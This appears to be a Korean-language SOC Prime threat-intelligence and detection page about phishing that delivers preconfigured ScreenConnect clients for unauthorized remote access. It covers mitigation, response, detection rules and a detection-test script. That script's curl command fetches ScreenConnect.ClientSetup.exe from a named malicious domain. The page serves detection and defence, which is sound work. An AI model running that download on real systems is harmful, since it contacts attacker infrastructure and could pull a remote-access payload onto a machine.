SOC Prime Bias: Medium

05 Oct 2026 17:02 UTC

ScreenConnect 클라이언트가 무단 원격 액세스를 가능하게 하는 데 악용됨

Author Photo
SOC Prime Team linkedin icon 팔로우
ScreenConnect 클라이언트가 무단 원격 액세스를 가능하게 하는 데 악용됨
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

공격자는 피싱 이메일을 사용하여 합법적이고 사전 구성된 ScreenConnect 클라이언트를 배포하고 있습니다. 원격 모니터링 및 관리(RMM) 도구는 공격자가 제어하는 인스턴스로 콜백 연결을 설정하여 손상된 시스템에 원격 액세스를 제공합니다. 이 캠페인은 합법적 소프트웨어의 신뢰성을 악용하여 기본 보안 통제 및 탐지 메커니즘을 회피합니다.

조사

조사관은 PE 파일을 전달하는 링크가 포함된 피싱 이메일을 조사했습니다. 분석 결과, 파일은 합법적으로 디지털 서명된 ScreenConnect 클라이언트였으나, 임베디드 구성은 위협 행위자가 제어하는 특정 릴레이 인스턴스 및 인스턴스 ID에 연결하도록 수정되어 있었습니다.

완화

브라우저는 초기 보호 계층으로 실행 파일 다운로드를 차단할 수 있습니다. 조직은 승인을 받지 않은 RMM 도구 사용을 모니터링하고 신뢰할 수 없는 웹 링크에서 다운로드된 실행 파일에 엄격한 통제를 적용해야 합니다. 응용 프로그램 허용 목록 작성은 승인되지 않은 ScreenConnect 클라이언트 및 기타 승인되지 않은 RMM 소프트웨어의 실행을 방지하는 데 도움이 될 수 있습니다.

대응

악성 활동이 감지되면, 공격자가 원격 액세스를 지속하지 못하도록 영향을 받은 엔드포인트를 격리합니다. 활성인 ScreenConnect 프로세스를 식별하고 종료합니다. 공격자의 명령 및 제어 인프라를 파악하고 손상된 시스템에 대한 무단 액세스 범위를 결정하기 위해 클라이언트 구성을 포렌식 검토합니다.

공격 흐름

이 부분은 아직 업데이트 중입니다.

탐지

대체 원격 액세스 / 관리 소프트웨어(프로세스 생성 통해)

SOC Prime 팀
2026년 10월 5일

원격 액세스 소프트웨어 도메인 통신 시도에 의한 가능성 있는 명령 및 제어 활동(dns 통해)

SOC Prime 팀
2026년 10월 5일

피싱 이메일을 통한 ScreenConnect 클라이언트 악성 코드 배포 [HTTP 프록시]

SOC Prime AI 규칙
2026년 10월 5일

시뮬레이션 실행

  • 공격 서사 및 명령: 적은 ScreenConnect를 피싱 캠페인을 통해 배포하여 대상 워크스테이션에서 지속성을 확립하는 것을 목표로 합니다. 이 시뮬레이션에서는 최종 단계를 복제합니다: 피해자의 기기가 설정 실행 파일을 다운로드하기 위해 감염/악성 도메인으로 아웃바운드 HTTP 요청을 하는 것. 위협 인텔리전스에서 식별된 특정 행동을 모방하기 위해, “공격자”는 사용자 지정 User-Agent 문자열을 사용합니다 ScreenConnect 특정 파일 경로를 요청하면서 thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe. 이것은 프록시 기반 탐지 규칙을 트리거합니다.

  • 회귀 테스트 스크립트:

    # 이 스크립트는 탐지 규칙에서 식별된 악의적인 다운로드 요청을 모방하기 위해 curl을 사용합니다.
    # 경고를 트리거하기 위해 필요한 특정 URL 및 User-Agent를 사용합니다.
    
    TARGET_URL="http://thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe"
    MALICIOUS_UA="ScreenConnect"
    
    echo "[*] ScreenConnect 다운로드 시도 시뮬레이션 중..."
    echo "[*] URL: $TARGET_URL"
    echo "[*] User-Agent: $MALICIOUS_UA"
    
    # 자체 서명 인증서를 사용하는 경우 SSL 오류를 무시하기 위해 -k를 사용하고,
    # 특정 User-Agent를 설정하기 위해 -A를 사용합니다.
    curl -k -A "$MALICIOUS_UA" "$TARGET_URL" -o /dev/null
    
    echo "[*] 시뮬레이션 명령 전송됨."
  • 정리 명령:

    # 실제로 호스트에 다운로드된 파일은 없으며 (/dev/null로 리디렉션됨).
    # 시스템 변경도 없었습니다.
    echo "[*] 정리 완료. 호스트에 남은 흔적 없음."